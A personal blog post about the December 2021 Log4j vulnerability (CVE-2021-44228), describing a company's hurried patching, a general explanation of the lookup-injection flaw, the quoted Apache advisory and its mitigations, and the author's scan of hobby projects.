Critical Log4j Vulnerability Fixed
A meaty exploit was discovered and shared on 9 December. My company made the decision on Friday afternoon that all apps possibly containing the vulnerability needed to be mitigated by mid-day today. I agree with the concern, but had pause with the mitigation chosen, and now in hindsight think we could have handled it much more simply and less hastily. I think it went well enough, but we have been receiving additional incidents and have failures that are related or likely related to ongoing mitigation efforts or errors caused by them.
The CVE-2021-44228 exploit is allegedly simple, and there's a tiny example called Log4Shell that seems to work, although I can't reproduce it in simple examples of the ways we'd be likely to be using it. Basically, the log4j library allows writing simple statements such as log.info("something" + raw_input)
and if that raw_input value contained a correctly formatted string, the contents of that string would be executed as that log statement was being built. That raw input could be input via an HTTP input (and most of the examples use HTTP input), or perhaps echoing previously stored values; the key is that it's not altered enough to break the executable aspect of the strings. In the most simple example I can create, to ensure that it's really only the library in the code, I can't get it to do anything but the expected echoing of the input string, which I'm modelling after examples from a Cloudflare blog I found early in my investigation. I'm still tinkering, but my mitigation efforts are done, so I really don't care any more.
So, three things need to be right. The vulnerable versions of the library need to be in use. A raw input string needs to be fed to a log statement in the way that the logger will evaluate it. And the statement needs to be able to execute as intended. Probably a fourth thing, too, in that the execution needs to have some meaning and value.
Not unlike SQL injection, which we still find instances of in careless code, a savvy input can alter the interaction of a planned SQL statement and do unintended things. This is easily mitigated by not doing that simple raw injection of data, instead encoding the strings so that things that could result in command execution get turned into harmless character strings instead. The easiest example is a SQL injection attempt that includes double-quotes to try to end a string, followed by SQL code to execute something different. This is a humorous, not exactly inaccurate example:
In this case, according to the articles that are everywhere on the Internet right now (most of which are repeats of other articles, and few of which have useful substance...which is fair because they aren't generally written for people who can understand the details), this can include code injection and execution in the running apps. This, particularly, is very hard to do, and requires file system and code loading events to take place. One discussion included how the command could download a class file into the app's execution folders, making its contents available to be executed. There is a whole bunch of stuff that gets in the way of that being easy. Possible, yes, but not easy.
Most important, and much easier, the injected command could leverage its access to the current request or running server and grab whatever data might be accessible in memory and share that. Or, a DOS attack could cause that log message to block and wait for enough time to disrupt services. That one is pretty easy. Whatever the external resource does with the data, it isn't just that the log contains stuff, it's that the request contains stuff. The exploiter puts the right request together, and all the information is sent to that remote server in the exploit. This is how credit cards and other information are stolen. One way, anyway.
To be sure, I'm not saying it isn't important, but it probably didn't warrant the concern and late-Friday chaos that occurred. Certainly not a push to mitigate with the next 24 hours. We did it, but I'm waiting to see if we had reason to rush it. We're in a bit of a careful time with software releases, such that I told my team we couldn't do our regularly scheduled and generally well-vetted release next week. But now every JDK app in the company is likely to be redeployed. And with it, the risk we wanted to avoid in accidentally breaking flows and dependencies and introducing unintended changes.
As my team rebuilt our apps, simply replacing vulnerable versions with the protected newer version, I asked if we had checked to see if we were logging raw input that could be gained from our REST or other HTTP inputs, or straight out of other data sources. No checking had been done, some suspected "yes" existed, like in the case of "user can't log into this app," where the user or app name are provided in the request and could be echoed raw in the log messages. Fairly, someone pointed out that we also don't write all of the logging statements in an app, some being in the other libraries we might use. When asked if we saw any evidence of this kind of logging, especially with any of the examples from any of the articles, the answer was "no, none we see."
Here's what the Apache Log4j site currently says about the exploit, in case they change it later:
News
CVE-2021-44228
The Log4j team has been made aware of a security vulnerability, CVE-2021-44228, that has been addressed in Log4j 2.15.0.
Log4j’s JNDI support has not restricted what names could be resolved. Some protocols are unsafe or can allow remote code execution. Log4j now limits the protocols by default to only java, ldap, and ldaps and limits the ldap protocols to only accessing Java primitive objects by default served on the local host.
One vector that allowed exposure to this vulnerability was Log4j’s allowance of Lookups to appear in log messages. As of Log4j 2.15.0 this feature is now disabled by default. While an option has been provided to enable Lookups in this fashion, users are strongly discouraged from enabling it.
For those who cannot upgrade to 2.15.0, in releases >=2.10, this vulnerability can be mitigated by setting either the system property
log4j2.formatMsgNoLookups
or the environment variableLOG4J_FORMAT_MSG_NO_LOOKUPS
totrue
. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove theJndiLookup
class from the classpath:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
.Other News
Log4j 2.15.0 is now available for production. The API for Log4j 2 is not compatible with Log4j 1.x, however an adapter is available to allow applications to continue to use the Log4j 1.x API. Adapters are also available for Apache Commons Logging, SLF4J, and java.util.logging.
Log4j 2.15.0 is the latest release of Log4j. As of Log4j 2.13.0 Log4j 2 requires Java 8 or greater at runtime. This release contains new features and fixes which can be found in the latest changes report.
Some of the new features in Log4j 2.15.0 include:
- Support for Arbiters, which are conditionals that can enable sections of the logging configuration for inclusion or exclusion. In particular, SpringProfile, SystemProperty, Script, and Class Arbiters have been provided that use the Spring profile, System property, the result of a script, or the presence of a class respectively to determine whether a section of configuration should be included.
- Support for Jakarta EE 9. This is functionally equivalent to Log4j’s log4j-web module but uses the Jakarta project.
- Various performance improvements.
Log4j 2.15.0 maintains binary compatibility with previous releases.
While listening to my team fix things at work, I spent a little time fixing some of my hobby projects. I did a scan for log4j references in build files, included JAR files in lib folders, property files, and log statements in code folders using ack. Fantastic tool that, for such quick digging through giant collections. Sadly, it reported a bunch of stuff in version control that I had to figure out how to filter, but that kept me busy.
Because I'm a huge fan of Continuous Modernization, I didn't have too much to do. In a couple projects where I or a dependency did use log4j, I ensured the version was updated to v2.15.0, as recommended. I rebuilt and redeployed those apps, 'cause it was easy and Continuous Modernization. I did check each of these projects and didn't find any cases where I had injected raw input into log messages. In a few cases I found that log4j was included but not used, so I removed it instead. Finally, I dug through my log analyzer looking at the error logs for the kinds of things a dependency might have logged, but didn't find anything in the last year of data matching a '${' formatted attempt. There are way more PHP attacks than any Java attack, and even they didn't include that in the captured log messages.
A little bit of me does want to get my test working. both because of pride (it seems so straight forward), and because I want to see if the exploit will execute even if the message isn't logged. I mean, it should be the case that log.error()
would be the most likely to be successful, but I'm curious if log.debug()
evaluates that string enough to make the exploit call, even if the message is then discarded. I would expect (and maybe I'll look at the log4j code to confirm) that the level is checked first-thing to shortcut the use of the string. The runtime will concatenate the "something " + raw_input
, so that if raw_input contained a valid ${exploit}
string, it would be the case that "something ${exploit}"
would be passed, but the logger wouldn't then see and interpret the exploit part of the string.